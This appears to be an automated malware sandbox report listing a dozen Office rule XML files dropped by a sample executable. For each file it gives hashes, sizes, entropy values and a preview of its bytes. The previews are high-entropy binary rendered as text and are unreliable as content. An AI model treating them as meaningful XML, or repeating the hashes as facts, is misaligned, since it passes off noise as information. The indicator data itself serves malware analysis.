                                                                                                                                      Preview:<?xml.$...A.2.6OMXc...q...le.h{....:.s.T{P.v.x.......D;j.E.......N....&....g......Sy'A4D..S...4l..6.),..{.uS..&..n...+.........1..Q....t.7....Kx.`:.s.gL.p)../........+1...;..Mz*......L...`a.^P...:...sY..j.{......0B.p6...H:.....s.F.W..l6.Gs.....G.4#.....>H:.w*:.nv..0[G&.'.1f...Q.0...;D.T"_..Z....M...1.b./....v.,.\..F...:\..F.%..?<*.....G..R......P.N....jl+.s......M.h...3...q.M]Jx..R..W..2..U....0.....4l.~g.:.W..2.....L0./...5..@|..YNP..k....Z...3..b....@e..`k......jL...R.-...j..)..o.Z.....Ti.(.`6...D.*..J...Pj1.[..@.T....p3...}P^.x.e/.9....(.....b.N...hV...IAX...Mks.....h..Nfpz.4...V'...|.X.C..`.S*Dz..M...c.*..#..YB..WA9...do5..8tU7._Pw0.........`.....a.W.v .\f.9.b....(......)^q...F.f.f..X...k.c.h...E.0.. .%EE./L.....5.3E.mp.mo../_..y.1.(a..Y.... n..Q.."....^oS..`.5..t...:.......^..C..n.|....!..?8..*...P..o....(..F.Cy.c.i...e....u...QB..l.L.6.Q..L.u$P.....^.J.q......=......A.....4.&).fl....w.r.SD.w....+..8......%.P...w.X..O&.......d.../.F.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700050v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1685
                                                                                                                                      Entropy (8bit):7.894869053876319
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:TEh5uvXHe5vX7J/oNPZSJlz8isF+V82Qp4aJegg5V/ujlmPyPwfgTWopFJT1dkwr:TauvI9OI8Ay5gv/sXVTcwwFKD
                                                                                                                                      MD5:609EE22597E6853103158534D919482D
                                                                                                                                      SHA1:70CDD9AC6CA27D80954B1CD12B6E29BAC3B8F3C1
                                                                                                                                      SHA-256:2E0B9CA5CB3498CEC821DD5568234B5A1B7C95FC56704A5B9F2880E7EBDE22D2
                                                                                                                                      SHA-512:D24D4E2B51962578BD6FC71E5616FA434C76335513900619A6460539433C2C1CB0FF19E2FA188431809209A6F2F62C218B311ABA7B2225AE285CD58783013F36
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..:X..P>.Q.Z.i.a...K..N]H.vO.B.m.....:.v..(&:y..SL..q...T0p{W.,T.Utx.../D-p...i.)Xx...&..l..z2y.....G...=kj.....8..s..p.>.5f.Q...R$p..U..8...I....!..R.5).Yfg...PW.P.BK...b.'.b...b'I^JG......l/x....?.....#H.v..H.y..$._.|..A.m.nJ.c..X....E1|....HeX8n.[ .._1.B........K...........E....<..&......aZ......A....g.9P.J\.U'.....1..!(.........$.:_"..`l.L.L.v.|aE.X.......B1../[.l..jo..Q.O..^.-.J..S.....$..QmS7....1.{.r..4pcd*^.k..Zl?b$.......q.....(.y..r..!{...............|.h..#...DL.....iZ..%..8.X?=.l.).@rY.h.p.R..^.e+..C...r.n.'..x./.;t.]j...".CE...G....t...%\.....ZZR...AA.d.'i.c^....0.a...O.d..IBVjk.B|2cp..OLHoE...T..,..u&.~..Gd.8&F.....S.....t.~.X..k,..UH....V...w... ..Y...<...z....3. /....+un.%l[/*....~.`p..O...hL...=Fi...+.]W...5....\..T#.]"..=.8h.4.2*...9%..KE..D.?...c...$....A.[..|.$.iY...T...6eg......h>...e.Eb3.K...j.6'.wq.A...&..$.g..X.....#i..p...4..<...F.B*.3koi..=.k......[.&....~S...-...2..D..|w}B..7..@.BX3#J....t^.7].ld..!...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700051v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1722
                                                                                                                                      Entropy (8bit):7.878249948450851
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:eFj5b4VILfySpR85aHmxv0ZbcbpTkFyUJ8/5rrEj/WAhNNTPznl+qR8dBZbD:e95MVcfbaaHmxv0lOPUadrEj/tb5GdPD
                                                                                                                                      MD5:4DDC54D2A626D4A607D47FC70D955BE0
                                                                                                                                      SHA1:985DC69BE3A5B82DA64F83E296FC92A447D3FDA6
                                                                                                                                      SHA-256:44E058F950E2F308AC640C69547C66AAA0423283E469C43C02851ADA8E1F1B9A
                                                                                                                                      SHA-512:A730492FC5246D2F6800988DC56279D60620AA3B3C0BD8210237C7020FEEF54A8C2B37A185FE733D922D7CE6EF2A91C3F6A7C8B115393816350C4232AE88291E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml_sB....b.......$X..;7ll.1..[..x.....r.#j.._Y.W...bH...A...?......}kW...,Q..59$\A.n..v.....]..y.C..*....c.DKE@4.[..os..V...I...R.>..'...;4.3.Zu.b0..V.G.......Lr.T;......(...BT..+.$.6..r}_..9..f`.-."&.5...+....39...E.{..Oh.F.o....;.+..g..>..p..l..+.o.............?\...\X,......|..F.|.q.x...F......<[..k<h..~....:F..Jyl...~.IS%v...o.y.o..m..k...)4....!B.S.4.......x..EA..R..j.(M.....Z..y...q=c.-...l..i..Q......t....Q.j'..."H.#..q.?..m.PZ...?..+.K5.l.....0\..Ae.Q].7..<......Ns...)gd..W.j.b....9m.g@7 .]..3.T...(..<.aY.a..j...5.h.$.E....GK....u.{x..d....K...B.c.;...>..........L.xh.....\..].oF$..i,.U/V..........< .O..{..F%.1F.)..lQ]."....ZH....H(...~oC....D.im)nyhS..6....Q...Wk.:.1.WZ3\.DI#...Wa...f......A.y.p09{..o.{C...........N4R&..6 >.mg....$aX3.....bkH..A...e.}...D.....aZE...;1o.n.2.....q..]f<~7.0#..%......z.....A.....+N....d....wG.Q..ui..D.f.O...O(w..*A.#t...~..RB....(.K..4c|g..S^..._Q..:.E.sZm.?^xb.......5EW.{.|..}.D.....1.6.j..J....

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700100v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1691
                                                                                                                                      Entropy (8bit):7.88689467096602
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:xvjPIPGjBleC4HBslrAusfNkrcBvDOWbGsrLt5gTD:BSGjLC2lUfNkrcgW6sF5g/
                                                                                                                                      MD5:322A4BE6C1BB7413BD1ACED4584D2DC7
                                                                                                                                      SHA1:D41D425B12F1075DCED936A7655A4DC968FD4CEA
                                                                                                                                      SHA-256:809A1BEB038F287682286A85C1F589964BC16E408DDA31799264A9A8E59ED6B5
                                                                                                                                      SHA-512:C81E51C62384432E203C20C7BAAB319A76F85C9E376227629F7B59CAC3F01C0C2F8AA7E594AB848291E6D22E731CDF20DAF573BB82543FD4C7F4633C35ADE921
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.$..4..O..3..c7.1..dr..c......,..JZ...w.......(.4........s..fC.~)...J.){.v...K%.6.Z.G.2C..*.F..e?.........*....@...Q.!,j!\....X.."..oy=3X.......D24.W......... ......U2.Pm.b.-.g&.<z.*(....zU(/b.7.B..`Q.5.l...}...Nz..tT......j.yAK.".....;.x..=u....$<dN..X.:[...#_...F....Gr..2....D.pK...._.....0%..-...v.q...~\U.....`l|.3..1u\a..t_...1@.4.....U..v..5...SY.....b......a.Hebk.w..!.`b6..%f"G..O....\..ri...?.z..7.$..A..7zL.rG.l.....*\>A0.:..+.v.Lt........l..g......Z..PJ.......c,..24.w...;3t..CHiD.....=.U..zZ..[T).%.7.5.....g......*^.....r...!5...6.. =.....cI..C_.m...t.aZ..l..p.+1........<&..j8..N..F/5t.......Y..E..x}..,..?3...d.sY._..KH......n..sv...6.4AC><H@Y.5..p.(t 6.[....h.#.0,...}Y.SIB..O..o.-. v#6...kB.[.J.....|..k.?b..=..O....P./1?....d....r..x...'+w&..&%.....q.A2....KN.,....4...K.9ST\..?+.g...;..6-.U,.0....:....5......J:...x...~.>..:W.....M:h<-@....).K...o.n.K..$c....q...|.q..+X5..G.>..K......0+xp$..|..T./y..m:...I..y.1c....x....^N...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700101v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1728
                                                                                                                                      Entropy (8bit):7.904950535224851
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:xxbH6WjyRMcxYfvNL/ESkvTRw5lRMYtVGwuSHHv0jkKqsWnDIStAyNkibD:baWORMcxYZ/dktiMfy841tDtSCD
                                                                                                                                      MD5:5E7B9703F6D6C4AB74E0ACEDCAFC898F
                                                                                                                                      SHA1:6D960C92D2ECB8320E418301EC107FCB8B91E846
                                                                                                                                      SHA-256:B95A1C8839CD413968E3491CF51269436E83D1FD212E25A31DDF150FF7512AEF
                                                                                                                                      SHA-512:90AE68856465C0DC7CBD7C970F7757898E0C8A0CA373337B339E9B433CD888FB1655C9B4569761A134C18380512C257E5B36AFFDD3BAACD58009D4951397E7C9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlBwa.}..%#./-nz+..S..O.H...cD....j../....of.?j%P.I.*V:.>~1....i...nZw^9...g.1~w..y.[...?..g...H.A.s....b......l..#..i...M..e..`..:.w....e.0...<.$...A..|7Kq4.9.....5m.a.-.M..:.gu.Wm....[.x....I:...Re..8..Mi.=..}......hu.h.d... .O;.M.r.{.N.2u......3..&......e..#.."7..J..T....Eg ."......([....N..q..JKKd..aZ20.^.g.....'.....e.....].!S....(E...sO....M..`c..+.....)....S..~....M.v.{~l.y..D.NG.!,W5...Q......s.lc.):v.Q7...t|..{.e.(g_...>6@6...o.....+#.~.|"..v.d:1.I....Z.v.S...F..z'/..y.y&(.?q.AGb..c...*.rlc....8y.[..}..;...T.4.i..D..$...a7l..Cp...cc..A.....fA.l..../.9.k....h..sF......W[N.O....t.m.\.y.L.u..e^.M%..t.gS......D...O.......!.....e..\.._...qN@.......j....o...tt.....+a.Mo^ZX\...].....X.!G.b..8X.,Z...6D...>.../.k.E.]....B..-q..?{.6.$VR...d.....ao.o...G:a0.76. 1u..B..&.Tf.d.u......./.........'.;..."..>.02........M..?...|..>....e. ....C.....yRVz..8.W...(+T.y.Yz..../.....C.......dLfT..}g..>j..H..>.w=..Z&K..H...........f..~U..Q/D..<.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700150v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1695
                                                                                                                                      Entropy (8bit):7.880991554616354
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:vMG0RcM5V/ClRwFIII5Da+jAs03/IMf5ulD39G8ZqTOuE5ORPCjQhvRU8MW3+j9s:f0uw900+jUPIMfkGyqCnWPCmvK8Mjj6D
                                                                                                                                      MD5:3821D0B9F61D862966ECC1FB6D6278B5
                                                                                                                                      SHA1:06D57CB296A9CF209C1B650B5B030CA8A80C83D1
                                                                                                                                      SHA-256:EB7D936A24F5CBA77377F3C4B262BE8AE3404468A53FAC8D5D9199DCB67AD5D9
                                                                                                                                      SHA-512:263D8CF5BD2768C4199DAD442E8B8933B73ACA2A3587678BF8B43AF747222CF827FAF66337C397C8D5C2A6232892E46BAB0284FF9F76DC5109552CBE40A2137D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml4.q...!..3.8.+...j...'k."._......v.....S../s...c*......A.W..F.;.|P........7y..m..2..hI.4o.Nz.....t..y.\w.Y.?..=.d.v.g%1.H..V_MJ.N...E.w.#...J]L.;..{.........}&.../.e..W...S.F..pF..f..U@.&"..Z4[1.G.. .948..H'`.<n}?..y..&.,......<.....>J..g:.I.Fv.M..\j..T..cMl..."...ie.M.t...?.Ud.......a@...V..p7.......Wk..5fst..8"..E.J..J....^.7.v.B...5..-.I7O.mA.{n.X.P.....><-E.z.....C...7.He..'....;..^.([/jD>.G...X^.{...L...S..u.{.@8#..1..M....T..5..s.AH.B.4.....J...|v.....b..0.,..W.s.R.m i..\....i.....\].....Mp*.....J.8X...};.?..:.P*....DZ..M.j.........`.`C..C....9...13e....G.....a*....X..@.S.(..bX....../.X.v...:....'._.Ga+?!.!Y...r.Kt......V.~;.I!..6&.d.P[..B4`.c.~.[ .[:....V.yf...5...N<..S.................d..Z....a.^1......S.c....A..../....6....d...F...A......B..zj3TxT..i....I.Gf ....S5..'..UP./....9+L..I.1..X........\=.<.^..\.G...Z......*]2p.d#$...;..}m.Q%.r.&V.K...ud..z.....a....o.Jg.O...}.69$.-. .......=:.%........i...'....FA.6.3s.".i..i.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700151v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1732
                                                                                                                                      Entropy (8bit):7.878494280590648
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:wmePyLEo0AFVBh3Txx7fSD/yH1jmOi9oLhDA6rFD:wQ0AFVBhFtq/yHUbwDdr9
                                                                                                                                      MD5:2C399CD68FD894207499701F352FBAA6
                                                                                                                                      SHA1:FA0A178EF2492742191FC9940F598119B2458258
                                                                                                                                      SHA-256:5E46CE3EEB60CD31762E948A966AEDCCCB68E34595A135D1C1365359C762B33A
                                                                                                                                      SHA-512:E72A5FA1ABE40457ED2CBB5178AE47B6080E731CD8171D8E928DD7D4CCE88409EF6133394607F98164881EE5CC100581961A4572FCCA1A529D65E4308804EACF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..[.b..#.-....}..}.]..Aan..f.g.t...M.c...KjH..j......9T.|..8.C+...2...N..j .+.F(.N..Vw]n1..%..:.FJ..E....AC..%.......K......{....1..{...Ns8......7.X(. r...f.I.F.._.........o..X..:F....d.. ...l.zc(#.:..Lfb`7."..LA.x..M..>w.o...7....../.G.ZLeh..AV....a;....4.4W.8.^3......WO:== .o.....Qq...F.2....b..b..F..f..V3.f.e.}..$?.[.VD?.T4Y..\.:.S%k...[9......'e.}.&.....t[..A...4L..W....y..|{^3!B.V..~.....o.U.w.k.....z.e.s.....]V.#4..z^.QkQoyh *E<m.W.'?x.....Vv.$.........+.>f...E) .%*..1.d..R....P(>.?#..,)k.\.1g...S.9......&F.st.....T........=3.T<.....0..3Q!{M..\...Z.../(.0*.o.>.X.....g=:.....Y8.J...q.Yv.z..f....9.g.H.h/..Oe.F.....A....Z.KV...#.4x....\.H.Hl./b%N...n..&....1..=.?..YMr../.|E.....[..).QR..&..I.V,...3......w..Q....J.E..vj.rP..#..... 6K\.{]\n..Z.Q.3#L.7u-a.O.bG{9..}.v\kTW....X._.....M..3../. ....4&........]..]......s.vj.3Y{9....c...iA!.................z......~..p...4.T...S...X5....6:..........Zv[.P...z...I..\g.....gPU....

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700200v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1689
                                                                                                                                      Entropy (8bit):7.87770627463443
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:J4mNZSG7YKarIU2HgijsEjQqqmLRlx35uwlnD/pqdD:C6S6YqFBjsEjQURRugnD/s
                                                                                                                                      MD5:0955A8D375797EE6924D14265DB8C672
                                                                                                                                      SHA1:7A29C4111203935DAF4849A302024C355D84B6EB
                                                                                                                                      SHA-256:BACD37811ECA765F5F1038A7D2352C60DF266ADA243B03111BC821375E07DD96
                                                                                                                                      SHA-512:023D52AC0B47CEEC0A5B266898506EC6140091F2C397777D0870824F087419E0F934669A70CBB9AFA0004D0CE60DB5AF941300D31AC54104D7551381B07891C4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml(...~.z..W..[...5....Kk..i)?.]Na......;..JK........`z...>..n.:}.;f....K...S..../...kc.B....;q.(....Ro..._V..V.|.S.......t.......h..h.-2...r...XBP...%.4.$...q.X.wh.o..[...(....G.......S.C.Y...T+6..I.....D..&.]..l.F7[..+}+....s......r5.x..`7C.2..[..Drr...f-..sY..t...}..\.|T....}..x....._.B)#.....Fh....|:x....t........='A...t...\..]zm0......@..C........_..G....#.t.^w+...n...#b^{...w.q.R1.E...D.n.&.ab.<.(\..../..3....K'..g.,I.s4...wD............'FB..(.....\.m.x.b....G.h<.][.q...n.iZe.`<.i.....+r..|$S?..g....0%nf.w@..g.....+......9.....1.7...U.#.Z..)=..>.?..d.....G.1'.6r...e.=B...kym.0.......t_........^...m....Z.Lt....haA+,.r....u.O... . ........s#...5..qV...u.&.6..a...&.J.@.f?..O...P.I.....2.....W.....G.[.. .Q.n'.1Yt.3.y.-Qi...el.Js....|0...CF.tG..F..A...}....s.Z...CU.....-a....[..w.T.s0.O.d..o.....5...J.q(.T...#....E......P.~.g..WgK.O...p.T..^..tli5n...l...F!^Ya.>..L&..........M.w.W..1..............E..'..A....4..v....[.!..{.H?^.j

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700201v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1726
                                                                                                                                      Entropy (8bit):7.874502505171306
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:OOyFxsalEGEAIULrRjg7rBFnsJeCUmlX9TD:C/salEGD3LNj+CJFUOZ
                                                                                                                                      MD5:67D1AA9E70588CB8F2308DC819EE087F
                                                                                                                                      SHA1:8A93086FC37C2BE0867CA9535B1530D805355379
                                                                                                                                      SHA-256:3EBCE6415CE6FEF3096FC464AB33AF4E219DCA8C9448CA101E32B5D7212131D0
                                                                                                                                      SHA-512:929558546B8A08BF3A728BC8C2A2CEFB8B20570EC0E811C1A9BCFA01069014057EF20BDB8DCD23E230C6ECDFD71AFEB3A0819E849D23CBBE4F813B1946E2B948
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.E.T.......e...G.7.L\%.3=TR)..`,/ys<`...X..v}.<.!.....~G..aev...%n...B.E....a~..,[...$.x.....mK\..W.IS*Q..R..H.%....l......x0...d.....&u,j.$.C...'.h.............H..=^/...).D.PB^o......y.8.t.....tMLy5e6.]..f .zvo'..qD5.E....,.U.[...n...,...C*:.[laV..t....m5..........8.f..Tv.....l&+.TW....5v.01EU...].l....$. }.&..{V...E.jb P.1..Y38.Pq.`.~........Y..m#....*...............n..b...~...Q...1$.C....0[&yF.....H....K...S..d.p..&......@!.`C...f.f%.Q...E.qh.kN.l.n.6V.M|.i.j..D+/.).t..(.....,....6..z.....1.....=b..?)=WP..._.!9.Ud.".i..............H...&~.7...q.u.k....q..s.U..kl.W.5.....fF:.....L..V..C.....-b.\H...yf.....{..\.J.B4!..aC..cR.F..a.J...M..k......w.......b.SOf...`%....?f...:...6.3[....'^...>.'......-....-y~.......}....!...V0...Y.........;.+...j...Y..ier8m..q.S.....q9+..t.....[4.2........D.{O'X.z.........~v......3;.d..(.E.^i.......8^d|..).:..^..T.....;${H.2.|v.....$x.3d3z...n..%e.5&.!..Z......?.|7...Yw%.OH&Z..j..g...S.v.\A.0....,..Af...l.p:

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700250v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1691
                                                                                                                                      Entropy (8bit):7.876672611108354
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:hAcgPWVpvlfvrEyHZvikXkyKpEaYpsUcvxybD:hAclV/fvik/ELiI0
                                                                                                                                      MD5:297FC1A5E1439DDEA57134BEECDCAF40
                                                                                                                                      SHA1:07CE6524C94F4AA0D1C21FC7B0A85AC0EDA2DA45
                                                                                                                                      SHA-256:B55490C5F29518983593FF5891458344FF34D030D369B42E24510905401F9916
                                                                                                                                      SHA-512:571A04F608345448DD02FA60E8E8C3ADDF629C695FF926D9260E1AEC9476639B0B80C63D7C4907F4494DDC1B64F20797D09DBCE8511D7DCD0EB88A819FF51541
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml"..HA...8S....>..1.GI...... ......,.E.8.C.R....U.].jsM.;.P.>.3.Z.fY.....#.|#...7.X8..k....F.a.M}..lc$^P....Ouq...>XR..y.)a.bs.S...y.Z_=9.D.p....c.Z..q^..o......t.<.h@C._......;d.....no.=......fQ.J.6.{9.......F.>6h.M..%.<."3*...F.].....PQ D3}.n.kk.G...W$......j.m..aPMz....Ys.G."7..@).N..t.9..`..|I|...O..Z{h.....i....Nu?#[4..<.f.XMt.....z..._.z..S..~0.0..o$XU..0.Lw!.e..[x.....D.?q.G./o._b.1.=..}..h;..!M_.8..G.~m,.?..P..&]r..F4a..._y..T/`Z..n.z..4_F...... .+F..\S...I.i.u....)ZI..U..x.]..)..D.$...`.D....._k.....F.>.%b..(C.L2#9......i...#...3....JA.rT...>..#fc..L..Iv.....!.pP...=.@w.....A..(1,... .isp .+R......E.S?lx#t.+..-lNP.j.b../!....C{...<..F.Y...si....<...+j..JK.(...@e.....6r.)@O...X..s.Y$OBV.......Sp5........q9...9.S.9..U0.E......~.fY0.#).........5Q...@....B..5.wL3.p.m.J%....%.....2V.<......Q.....w......j......X..V......'.p..Kk.7O..b...Ne.#.~..p.o-.`M.,Z0.M.....I~....S.gT4..E..]>.;MU........a8.....F..W....G}...-.fB.y`.9KGS;....r...H..;.M0.o...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700251v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1728
                                                                                                                                      Entropy (8bit):7.885158833739382
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:aE6pvKGELqB8P8wX76lzr8KQ+xWmx5cx2nSAwayF67/VwLeD:9CSPLqBkxyI+x1xSXaw6Tqq
                                                                                                                                      MD5:38345E429BD3B9102C48A510B07BE883
                                                                                                                                      SHA1:87BF8CB2BFD66C435630F6247411DC33F8E04D7C
                                                                                                                                      SHA-256:C57F948E85DF1B414203E7E8C06F0DCAC7622E1B545E65E71554BC7DCD8643CA
                                                                                                                                      SHA-512:4C12C13DBA153CA7CBF0078E592EB22FBA143E45F97475F8E184AAD0B13B83F826D487B43BB2D4F40979A69E468101977E18AA86A8FAA2C0E18852284DD264BD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.>X..fi.t=\B.....*.+....4....Q...?..p..u...nA:..l!..by9)..R...DE..R&..8...I..O+........].L.... ..>...D.\I.C.GX.h....?./.....Da.a..u5e.5.....1......})..J...)....PP..FG.....r........P.o.....QB./b.g....y...R mcY.&v$.....N..J.@.....8K..iU..fR&.N.pm:.$X.S.1.=.n..ut.7~........4.[...F..h...DV#..b..-.f.>~0a.)4.I.^.x.!I3+..UP..+d.............m.......xM.R%.A&....r..xB.......y.q..-........5... Q..AZ.P...[..+:R...+..\.?.5zgmi..y.1.].....).1.....@...1..u.6..z./.+.37.....Y&..d2.>....k<}y$d...Ck6O..$...;{.5...1a.7..w.W......../`.q..]...+.....o)6L..<.|..g..].....(.3.e.lt....3.(.....J....}.y&U..u..o......S...._....3l..#.I.n_..J.--...L.d....-..P~.A.YT.W..2..!....`/u+kY.^....V..^4a,Vw..k...Y.ID..2[.......v...I.../..a \K.15v.Z..-/.%._.Rg........y.Y>.5..E~.a8IZICqU...x..s.....I4...q..=j....b.6...V..w.vB...W....*.1r..}.L..v[t\..jv..../z.u.~...jz.....j.u...........2d.G...|...7.Ti.j;.....8P....^..sKE... ..d.3....>.g......R.$n...F...sW.^.SP.o..x!.."..1..0z.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700300v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1697
                                                                                                                                      Entropy (8bit):7.876664350101512
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:9c7eJMGnOWClbHPqymyYf0GkCIYDFQo2c+ooDSD:9QqOWCRvqdrf0GkJYDz2Ht6
                                                                                                                                      MD5:FFADAFE13426167C4D8B43C58D7BEDAA
                                                                                                                                      SHA1:7DCF7C05594C35FF17D3A897DD066888075EDB62
                                                                                                                                      SHA-256:2D783817A64D08AE507D74CED117BA8FB59BBB718C0DAB998D86BB06DB8AA385
                                                                                                                                      SHA-512:877017732FECEA03F86785038B855D58B053D007020C0B49EBA1120AAC6DF75E6F10CF52A15D459568229E02AEA89923755A64ADBD0754433DC2D0458EE746FC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...)..>).u./3.,.v.(........?s....y.V..THk....;...}'qK.OE.s4...r..[_/..?x.......~.m.!..._.[mKNR89.T..1.[.b...Q.....F!%Q.C.....\.H.Pf..s...O...fk...0........q..kM./.{l*;W#97d...Z..n.....!J.h.....)c.T.5.4=?@.=......fd.%8.ib_z3f^.ea.>J.......c....po.=].{.Y.M$....fQS<.h...]....Z...*>t?.....~..../.....\.."p..L..[.Jgcl[r .o.y.;.........E.udg..u...%.L%e.V..]..........).F4......L.c.c.a...1Jd_...N..vB[K={..~.....o...=;..6....`......y.]....[If......w].....S....g#.`j.R..I..N..........u......3.....=.:.p..1........45..i..n..,....#.g..@..^h.-p1..)....?x.Z../...6.O.XK=.n.A.. ..w.7.|!......X.#.b.....MS.z....-......_..g.) 5,K*..a......A.F.L...d9..D.P.. u..y.lY..C.. GP.....=.....x...q8.4.... 1.MQ.lj.O..M%[./w....;].N...^|"5..!@..d.yCg]`.P....^f)u.)2.D.....>!.d........v.#.V.m..lq.....=...h<.^LR5.(..5.M....3[.'0>Y..u.7...O..x.j..2.~.Ll.A.e.....e}.I.Sw.!.E.w.#............4....w.UR/W...n....4..2*{.`.....q.5..>...Mq....[zG..g$.$.1....)7cweT.c.uq3...l.,]

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule700301v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1734
                                                                                                                                      Entropy (8bit):7.89800251586314
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:0z8LGpzO4+URYkng9cegcMq1PyzgD/jet/Lqs3xuD:WKGRO1UWgWMqczgTjUZhW
                                                                                                                                      MD5:4E0005278BD3443CF6DA28376B0B9DAE
                                                                                                                                      SHA1:E3AF41D96973ADC9201FC1B3C0BDF9C3087FC593
                                                                                                                                      SHA-256:02E6998F8EFF33FECA5DD1DB09CD00A18D5AFFEFAFC19C6BEF7B33DA31548692
                                                                                                                                      SHA-512:F56EF63D95BC1C147BB8B855DA90F3E621B57C09183F179A87E8007B164F1CA8C287255B43BEC0997E6DD7157BD54BD5E239B34624CCDA9282E773D079B93470
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..]...F.....{..k1..G;7.,.UT].J......[Q4.7P...@...en...I......'..~.c...O`..%.Za+....E.b%...A......W.......Me..Q..\.Z..}..:....~J./...$@......!...9.d.vyE.(.....:)S.c...6-..'vD..@Q)G.,...H.....8j.<`....N.u..R0..I.....MB\...Y.c<..(.&...s...r^s.r.W...AH.....B..t........_.U..E]..5. ..9.w...&..EJ..v...z.n.e..{...,.<..\./.f./\2./-S.n.yZ6..h....f..M.@zs.<.. c....\..O...HO...`.X}.....<..o..,.....Pz.ma...]..C."gK6j....l^.mE2..>..&.MFb.l@m.P*0C..=}........C..:....5{.X.4.:...=.o..#.I..LD.G.....2..$p.ny..Q.....~.Q}....yQ.....wP)f.KpU.3{...`.J#Y.zs.w.im...R.<.L.m.b{.JC.=...kA[.4..%.......Y?WkyU.t.....IB.s;.2...k..E...d.RQ..$$.._.y....\Q._.o....JVD.4S...@.\....lW.Q.uW.`.-X"..b+Z.W..L..>.BLl........c......{.....})L..}....-R.l...d.e.._...V*...G#..q.qqLz,avp)...}...gt.-.....J.K.=<,o..8;...eF0.-.6.....D(...+w.s.....=.I.....z..#11\&.r...j..[...:R*.6l.....!.#>H.-+.q. .........Iw...K0%.L&p.FS.V.m.P_w.dTm...z...\...G..........0(.*.k$>.....[.Dm~...z...&utP8..._5

